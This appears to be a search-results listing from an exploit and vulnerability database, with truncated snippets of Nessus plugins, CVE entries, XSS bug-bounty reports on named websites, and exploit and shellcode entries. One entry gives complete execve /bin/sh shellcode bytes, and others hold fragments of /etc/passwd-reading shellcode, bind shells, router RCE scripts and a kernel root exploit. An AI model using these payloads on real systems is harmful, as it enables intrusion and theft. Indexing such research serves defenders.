11967 matches found
JQuery Detection
Nessus was able to detect JQuery on the remote host. C Tenable Network Security, Inc. include"compat.inc"; if description scriptid106658; scriptversion"1.8"; scriptsetattributeattribute:"pluginmodificationdate", value:"2024/02/08"; scriptnameenglish:"JQuery Detection"; scriptsummaryenglish:"Detec...
Microsoft Windows Subsystem For Linux Local Privilege Escalation
define GNUSOURCE include include include include include include include include include include include include include include include define RINGSIZE 0x2000000 define PIPESIZE 0xb8 define PTRSIZE 0x8 define STRHDRSIZE 0x18 define LEAKOFFSET 0x68 define SHELLCODEOFFSET 0x200 define...
Node.js third-party modules: Prototype pollution attack (lodash)
As discussed in 309391, here's the separate report for each of the library. This one is the information for the lodash library. Module: lodash Summary: Utilities function in all the listed modules can be tricked into modify the prototype of "Object" when the attacker control part of the structure...
CVE-2017-17070
CVE-2017-17070 is rejected/not used; this CVE ID does not represent an active vulnerability entry.
Microsoft Edge: Chakra: OOB read in AppendLeftOverItemsFromEndSegment(CVE-2018-0767)
Here's a snippet of AppendLeftOverItemsFromEndSegment in JavascriptArray.inl. growby = endSeg-length; current = current-GrowByMinrecycler, growby; CopyArraycurrent-elements + endIndex + 1, endSeg-length, Js::SparseArraySegmentendSeg-elements, endSeg-length;...
D-Link Routers 110/412/615/815 Arbitrary Code Execution
!/usr/bin/python Exploit Title: D-Link WAP 615/645/815 .?.?', 'Product Page : .?' def dlinkdetection: try: r = requests.getURL, timeout=10.00 except requests.exceptions.ConnectionError: print "Error: Failed to connect to " + URL return False if r.statuscode != 200: print "Error: " + URL + "...
Linux/x86-64 - Read /etc/passwd Shellcode (82 bytes)
BITS 64 ; Author Mr.Un1k0d3r - RingZer0 Team ; Read /etc/passwd Linux x8664 Shellcode ; Shellcode size 82 bytes global start section .text start: jmp pushfilename readfile: ; syscall open file pop rdi ; pop path value ; NULL byte fix xor byte rdi + 11, 0x41 xor rax, rax add al, 2 xor rsi, rsi ; s...
Linux/x86-64 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes)
/ Shell Bind TCP Random Port Shellcode - C Language - Linux/x8664 Copyright C 2013 Geyslan G. Bem, Hacking bits http://hackingbits.com email protected This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free...
FreeBSD/x86-64 - execve /bin/sh Shellcode (28 bytes)
/ Gitsnik, @dracyrys FreeBSD x8664 execve, 28 bytes / C source: char code = \ "\x48\x31\xc9\x48\xf7\xe1\x04\x3b\x48\xbb" "\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x52\x53" "\x54\x5f\x52\x57\x54\x5e\x0f\x05"; Intel Assembly: global start ; ; 28 byte execve FreeBSD x8664 ; ; gitsnik@bsd64$ nasm -f elf64...
Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (0.0.0.0:4444/TCP) Null-Free Shellcode (112 bytes)
.section .text .global start start: .ARM add r3, pc, 1 // switch to thumb mode bx r3 .THUMB // socket2, 1, 0 mov r0, 2 mov r1, 1 sub r2, r2, r2 // set r2 to null mov r7, 200 // r7 = 281 socket add r7, 81 // r7 value needs to be split svc 1 // r0 = hostsockid value mov r4, r0 // save hostsockid in...
CVE-2017-1919
...
CVE-2017-2028
...
CVE-2017-1972
CVE-2017-1972 is rejected; this ID does not represent an active vulnerability entry.
CVE-2017-1913
...
CVE-2017-2058
...
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Privilege Escalation Exploit
Linux Kernel 4.4.0-83 / 4.8.0-58 Ubuntu 14.04/16.04 - Local Privilege Escalation KASLR / SMEP // A proof-of-concept local root exploit for CVE-2017-1000112. // Includes KASLR and SMEP bypasses. No SMAP bypass. // Tested on Ubuntu trusty 4.4.0- and Ubuntu xenial 4-8-0- kernels. // // Usage: //...
subsonicdevice.com XSS vulnerability
Open Bug Bounty ID: OBB-472565 Description| Value ---|--- Affected Website:| subsonicdevice.com Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Remediation Guide:| OWASP XSS Prevention Chea...
Happy 8th Birthday, KrebsOnSecurity!
Eight years ago today I set aside my Washington Post press badge and became an independent here at KrebsOnSecurity.com. What a wild ride it has been. Thank you all, Dear Readers, for sticking with me and for helping to build a terrific community. This past year KrebsOnSecurity published nearly 16...
Iopsys Router - dhcp Remote Code Execution
Iopsys Router - dhcp Remote Code Execution !/usr/bin/python import json import sys import subprocess import socket import os from time import sleep from websocket import createconnection def ubusAuthhost, username, password: ws = createconnection"ws://" + host, header = "Sec-WebSocket-Protocol:...
tekmarcontrols.com XSS vulnerability
Open Bug Bounty ID: OBB-456401 Description| Value ---|--- Affected Website:| tekmarcontrols.com Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Remediation Guide:| OWASP XSS Prevention Chea...